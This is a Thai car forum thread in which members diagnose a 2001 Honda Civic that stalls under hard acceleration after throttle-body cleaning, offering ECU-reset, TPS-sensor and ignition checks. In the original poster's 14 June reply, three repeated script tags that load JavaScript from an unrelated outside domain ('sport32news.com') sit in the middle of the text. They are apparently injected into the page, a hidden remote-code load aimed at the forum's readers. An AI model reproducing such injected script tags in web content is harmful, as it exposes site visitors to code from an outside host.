ตอบ
nuntawat


เข้าร่วม: 26 พฤษภาคม 2013
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 8 มิถุนา 2013 14:01 - ล้างปีกผีเสื้อมารถดับ
รถไดเมนชั่น01 ไปเปลี่ยนกรองแก๊สและกรองหม้อต้มสุดท้ายไปล้างปีกผีเสื้อเสร็จ พอจะเร่งเครื่องเต็มที่เครื่องดับไปเฉยเลย ลองสตาร์ใหม่ติด คราวนี้เลยเปลี่ยนวิ่งเป็นน้ำมันก็ดับเปลี่ยนเป็นแก๊สก็ดับ  ลองวิ้งแบบประคองไปก็วิ้งได้นะ และผมก็ลองจอดรถเร่งเครื่องแบบมิดคันเร่งเลยแก๊สก่อนเครื่องดับเปลี่ยนเป็นน้ำมันดับอีกอ่ะ งง มีใครรู้บางมันอะไรหลอเนี้ย
srithanon


เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
เสาร์, 8 มิถุนา 2013 15:10 - ล้างปีกผีเสื้อมารถดับ
ทุกครั้งที่มีการถอดเรือนปีกผีเสื้อออกไปทำความสะอาด  ช่างจะต้องถอดสายไฟของตัว TPS sensor และพวก สเต็ปมอเตอร์  ออกจากตัวเรื่อน   เมื่อมีการประกอบกลับ  จำเป็นที่จะต้องเซ็ทกล่อง ECU ใหม่ทุกครั้ง  โดยการปลดขั่วลบแบ็ตเตอรี่ออกสักหนึ่งนาที่  แล้วค่อยต่อกลับเข้าที่เดิม      จากนั้นลองสตาร์ทเครื่องยนต์  หากการถอดตัวเรือนปีกผีเสื้อออก  ไม่ไปทำการปรับหรือย้ายตำแหน่งของตัว TPS sensor การทำงานของ ECU มันจะจำค่าเดิมของมันไว้ในงหน่วยความจำ  การใช้เครื่องยนก็จะปกติเช่นเดิม  

แต่ถ้าหากช่างไปทำการปรับหรือล้างตัวเรือน TPS sensor  ด้วยการใช้น้ำยาเคมีพวกสเปร์น้ำยาล้างคอนแท็ค  ก็งานเข้ามีปัญหา  ดังนั้นในกรณีนี้ลองทำตามที่ผมแนะนำดูก่อนว่า  หลังจากทำการรีเ็ซ็ท ECU แล้วให้ผลออกมาในรูปใด   หากยังเหมือนเดิม   คราวนี้ต้องให้ช่างว่าตอบคำถามว่า  ไปทำอะไรกับระบบ TPS sensor บ้างหรือไม่  เพราะอาการนี้มันคล้ายกับว่า  ช่างถอดตัว TPS sensor  ออกมาจากตัวเรือนปีกผีเสื้อ  โดยไม่ได้มาร์คทำเครื่องหมายที่ตัวเรือน TPS กับตัวเรือนปีกผีเสื้อไว้   เวลาประกอบกลับ มันก็มีปัญหา

เพราะอะไร  เพราะว่าที่ตัว TPS sensor  นี้  มันจะทำหน้าที่ตรวจจับมุมองศาการปิดเปิดของลิ้นปีกผีเสื้อ  แล้วส่งสัญญาณที่เป็นโวลเต็จ ไปให้ ECU ทราบว่าเครื่องยนต์  อยู่ในจังหวะรอบเดินเบาหรืออัตราเร่ง   ECU  จะได้สั่งฉีดน้ำมันให้ตรงกับสภาวะรอบของเครื่องยนต์  ในขณะที่ลิ้นปีกผีเสื้ออยู่ในมุมองศาการเปิดของลิ้นในขณะนั้น

ถ้าหากช่างไปถอด TPS  ออกมาแล้วประกอบกลับ  ไม่ปรับตั้งโดยการวัดโวลเต็จที่ส่งไปให้ ECU ในจังหวะรอบเดินเบา ที่ประมาณ 0.5 V ก็อาจจะทำให้  การส่งค่าโวลไปให้ ECU ไม่ตรงกับการเปิดของลิ้น  อาจจะไอยู่ในอัตราเร่งเมื่อเครื่องยนต์อยู่ในรอบเดินเบา   ทำให้มีผลกับรอบเครื่องยนต์ที่สูงๆ     หรืออีกกรณีหนึ่งช่างอาจจะลืมใส่หัวคอนเน็คเตอร์ สายไฟสัญญาณ ที่ตัว TPS  sensor  หรือใส่ไม่แน่น  ก็เกิดอาการที่ ECU ไม่สามารถจ่ายปริมาณน้ำมันให้ตรงกับสภาวะจริงของรอบเครื่องยนต์ได้   ก็ลองตรวจสอบเคร่าๆแค่นี้ก่อน  เพราะมีปัจจัยร่วมอีก  ที่ก่อให้เกิดปัญหานี้  ........srithanon


แก้ไขล่าสุดโดย เมื่อ เสาร์, 8 มิถุนา 2013 15:51, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: nongzen  Ton-  EsNon  tokmun002  Thetom  tatam001  tokykung  napoon  patipat  khunmoo  fasang.Mr 
Ball Featuring


ชื่อเล่น: บอล

เข้าร่วม: 05 ธันวา 2010
ตอบ: 2224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2668
ให้คำขอบคุณ: 3022

ที่อยู่: พิษณุโลกBIG C
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 8 มิถุนา 2013 15:27 - ล้างปีกผีเสื้อมารถดับ
เหมือนงานจะเข้าเลย
Pantamitr


ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ที่อยู่: บางปู สมุทรปราการ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 8 มิถุนา 2013 16:29 - ล้างปีกผีเสื้อมารถดับ
ล้างตัวมอเตอร์เดินเบาด้วยหรือเปล่าครับ
ถ้่าล้างแค่ลิ้นปีกผีเสื้อ ไม่ถอดมอเตอร์เดินเบาออกมาล้าง ก็อาจจะมีอาการที่ว่าได้

http://www.civicesgroup.com/forum/topic52160 
nuntawat


เข้าร่วม: 26 พฤษภาคม 2013
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 8 มิถุนา 2013 18:42 - ล้างปีกผีเสื้อมารถดับ
ล้างเฉพาะปีกผีเสื้อเอง และไปต่างจังหวัดเพรชบุรีนะครับ รถดับเฉยเลยอันตรายมากๆขณะแซงคันอื่น เล่นซะตกใจเลยดีนะรถข้างหลังไม่มีมา ไม่เช่นนั้น อาจจะชนกันก็ได้ srithanon , BallBall ,Pantamitr 
ขอบคุณข้อมูลการเช็ดระบบรถนะครับ เพราะผมจะให้ อู่รถเค้าเช็คใหม่ 
srithanon


เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
เสาร์, 8 มิถุนา 2013 21:20 - ล้างปีกผีเสื้อมารถดับ
ขอเพิ่มเติมอีกประเด็นครับ  อาการแบบนี้เป็นไปได้ว่ามีระบบไฟจุดระเบิดบกพร่อง    กล่อง ECU ไม่ส่งสัญญาณการจุดระเบิด ไปให้วงจรจุดระเบิดทำงาน  อาการอย่างนี้  ต้องตรวจเช็คด้วย oscilloscope   ตรวจจับสัญญาณในขณะที่เหยียบคันเร่งเร่งรอบสูงๆ   ว่ากล่อง ECU ไม่ผลิตสัญญาณจุดระเบิดออกมา  ก็ทราบได้ทันที่ว่าผิดปกติที่ส่วนไหน  สำหรับตัว TDC sensor ไม่เกี่ยวข้อง  เพราะถ้าหากเครื่องยนต์ดับขณะใช้งาน  มันจะสตาร์ทไม่ติดทันที่หลังจากที่เครื่องยนต์ดับ  ต้องรอให้เครื่องยนต์หรือตัวมันเย็นก่อนถึงจะสตาร์ทติด  แต่นี้คุณบอกว่าพอเครื่องดับก็สตาร์ทติดทันที  จึงไม่ใช่อาการของ TDC  sensor

ไม่ทราบว่าเวลาจอดที่รอบเดินเบาอยู่กับที่  แล้วลองเหยียบคันเร่ง  ให้มีรอบเครื่องยนต์สุงๆ  แล้วเครื่องยนต์ดับหรือไม่    หากสมมุติว่าดับ  ก็น่าจะมาจากสาเหตุที่กล่อง ECU มีสัญญาจุดระเบิดขาดหายที่รอบเครื่องยนต์สูงๆ  อาการอย่างนี้ให้ตัดเรื่องระบบน้ำมันเชื้อเพลิงออกไปได้เลยไม่เกี่ยว  เพราะทั้งสองระบบอาการเหมือนกันคือ  เครื่องยนต์ดับเมื่อเร่งรอบเครื่องยนต์สูงๆบ

มันก็จะเหลือระบบไฟจุดระเบิดกับ  TPS sensor  และตัวเรือนปีกผีเสื้อบกพร่ิองจากการถอดออกมาล้าง  แกนลิ้นปีกผีเสื้ออาจจะติดขัด  หรือเครื่องยนต์ที่มีคันเร่งไฟฟ้า  เป็นไปได้ว่าชุดคอนโทรลมอเตอร์ สำหรับหมุนแกนลิ้นปีกผีเสื้อบกพร่อง  (  ชุดคอนโทรลคันเร่งไฟฟ้า จะทำงานตามการเปิดมุมองศาของลิ้นปีกผีเสื้อ)     ............srithanon
ได้รับคำขอบคุณจาก: kort999 
rattanan1977


ชื่อเล่น: ตี้

เข้าร่วม: 13 สิงหา 2011
ตอบ: 374

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 869
ให้คำขอบคุณ: 610

ที่อยู่: บางขุนเทียน - แม่กลอง
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 8 มิถุนา 2013 21:42 - ล้างปีกผีเสื้อมารถดับ
+1 ครับ ผมเคยเป็น เซ็ท ECU หายครับ
kobkobok


ชื่อเล่น: กบ

เข้าร่วม: 09 กุมภา 2010
ตอบ: 3919

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1738
ให้คำขอบคุณ: 290

ที่อยู่: สระบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 8 มิถุนา 2013 21:52 - ล้างปีกผีเสื้อมารถดับ
เก็บข้อมูลครับ
Pantamitr


ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ที่อยู่: บางปู สมุทรปราการ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 8 มิถุนา 2013 22:04 - ล้างปีกผีเสื้อมารถดับ
ลองวิธีง่ายๆ ดูก่อนก็ได้ ด้วยการ Set ECU ถ้าไม่หาย ค่อยไปเรื่องอื่น
nuntawat


เข้าร่วม: 26 พฤษภาคม 2013
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 9 มิถุนา 2013 21:22 - ล้างปีกผีเสื้อมารถดับ
ขอบคุณครับ 
nuntawat


เข้าร่วม: 26 พฤษภาคม 2013
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 14 มิถุนา 2013 23:43 - ล้างปีกผีเสื้อมารถดับ
คุณ srithanon  ครับเวลาจอดที่รอบเดินเบาอยู่กับที่  แล้วผมก็ลองเหยียบคันเร่ง  ให้มีรอบเครื่องยนต์สุงๆ  แล้วเครื่องยนต์ดับไปเลยและมีรูปเครื่องโชว์ด้วย พอชักกุญแจออกและเสียบเข้าไปใหม่รูปเครื่องก็หายอ่ะ พอสตาร์อีกที่ก็ติดนะและลองเหยียบคันเร่งอีกที รอบเครื่องขึ้นมา 4,000 รอบหน่อยๆนะเครื่องก็ดับไปเลย  และอีกเรื่องนึงนะ ผมแค่ขับรถจากแจ้งวัฒนะมายังนครปฐม แล้วก็จอดรถดับเครื่องยนตร์ประมาณเกือบ 2 ชั้วโมงได้ไปทำธุระซะหน่อย พอจะกลับสตาร์รถติดยากมาก พอติดนะเครื่องดับไปเฉยเลยสตาร์เกือบ5นาทีได้มั้งก็ติด พอขับออกไปเครื่องมันก็สะดุดซะหน่อยประมาณ 3-4 ครั้ง แล้วขับไปได้ต่อ อ่ะ อาการแบบเนี้ย เป็นที่ ECU หรือเปล่าครับหรือว่าเป็นยังอื่น  ถ้าเป็นไปได้จะต้องแก้ไขยังงัยดีครับ ถ้าเป็นไปได้ช่วยแนะนำ อู่ให้หน่อยได้มั้ยครับ ประมาณราคาเท่าไรครับที่จะต้องแก้ไข[u]  เพราะผมกลัวมันดับกลางอากาศตอนเรากำลังแซงรถคันอื่นกลัวแซงไม่พ้นและรถสวนทางมาจะชนเอาอ่ะ [/u]   5555 <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></  ขอมากไปเปล่าเนี้ยเกรงใจ แต่ก็ยังงัยขอบคุณนะครับที่ช่วยอธิบายมาตั้งต้น
Dark


เข้าร่วม: 24 มิถุนา 2009
ตอบ: 383

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 408
ให้คำขอบคุณ: 10

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 15 มิถุนา 2013 11:07 - ล้างปีกผีเสื้อมารถดับ
สายเซนเซอร์ที่ต่อเข้าลิ้นปีกผีเสื้อบางตัวมันไม่แน่นหรือเปล่าครับ แล้วลองเช็คสายแวคคั่มด้วยครับว่ามีขาด,รั่ว หรือหลุดหรือเปล่าครับ เพราะเห็นแจ้งว่าเป็นทั้งแก๊สและน้ำมัน
nuntawat


เข้าร่วม: 26 พฤษภาคม 2013
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
ให้คำขอบคุณ: 0

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 15 มิถุนา 2013 17:01 - ล้างปีกผีเสื้อมารถดับ
คุณ Dark เดียวผมจะลองตรวจเช็คดูครับ ผมล่ะกลุ่มใจประสาทแทบเสียเลยครับ
aotatix21


ชื่อเล่น: เอก

เข้าร่วม: 26 ธันวา 2010
ตอบ: 212

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 214
ให้คำขอบคุณ: 209

ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 15 มิถุนา 2013 23:40 - ล้างปีกผีเสื้อมารถดับ
รบกวนถามหน่อยครับ รีเซต ECU ถอดขั้วลบ ถ้าขั้วลบผมมันต่อเข้าระบบแก็สด้วยข้อมูลในตัว ECU แก็สจะหายไหมครับ
Dark


เข้าร่วม: 24 มิถุนา 2009
ตอบ: 383

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 408
ให้คำขอบคุณ: 10

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 16 มิถุนา 2013 11:52 - ล้างปีกผีเสื้อมารถดับ
aotatix21 พิมพ์ว่า:
รบกวนถามหน่อยครับ รีเซต ECU ถอดขั้วลบ ถ้าขั้วลบผมมันต่อเข้าระบบแก็สด้วยข้อมูลในตัว ECU แก็สจะหายไหมครับ

ติดแก๊สยี่ห้ออะไรครับ ของผมติด AC ไม่หายนะครับ แต่แนะนำส่วนตัวนะครับว่าหลังจาก reset ECU แล้ว ลองขับน้ำมันสัก 50 กิโลก่อนนะครับ แล้วค่อยมาเทียบดูกับกราฟแก๊สว่ามันเปลี่ยนไปเยอะมั้ย แล้วค่อยมาจูนแก๊สครับ
 
ได้รับคำขอบคุณจาก: aotatix21 
khunmoo


ชื่อเล่น: เปี๊ยก

เข้าร่วม: 15 กันยา 2009
ตอบ: 812

Guru ES
Guru ES

ได้รับคำขอบคุณ: 719
ให้คำขอบคุณ: 800

ที่อยู่: วังสวนสุนันทา
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 16 มิถุนา 2013 12:05 - ล้างปีกผีเสื้อมารถดับ
Reset ECU +1 ครับผม
aotatix21


ชื่อเล่น: เอก

เข้าร่วม: 26 ธันวา 2010
ตอบ: 212

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 214
ให้คำขอบคุณ: 209

ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 17 มิถุนา 2013 00:09 - ล้างปีกผีเสื้อมารถดับ
Dark พิมพ์ว่า:

aotatix21 พิมพ์ว่า:
รบกวนถามหน่อยครับ รีเซต ECU ถอดขั้วลบ ถ้าขั้วลบผมมันต่อเข้าระบบแก็สด้วยข้อมูลในตัว ECU แก็สจะหายไหมครับ

ติดแก๊สยี่ห้ออะไรครับ ของผมติด AC ไม่หายนะครับ แต่แนะนำส่วนตัวนะครับว่าหลังจาก reset ECU แล้ว ลองขับน้ำมันสัก 50 กิโลก่อนนะครับ แล้วค่อยมาเทียบดูกับกราฟแก๊สว่ามันเปลี่ยนไปเยอะมั้ย แล้วค่อยมาจูนแก๊สครับ

 

Energy Reform ครับ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.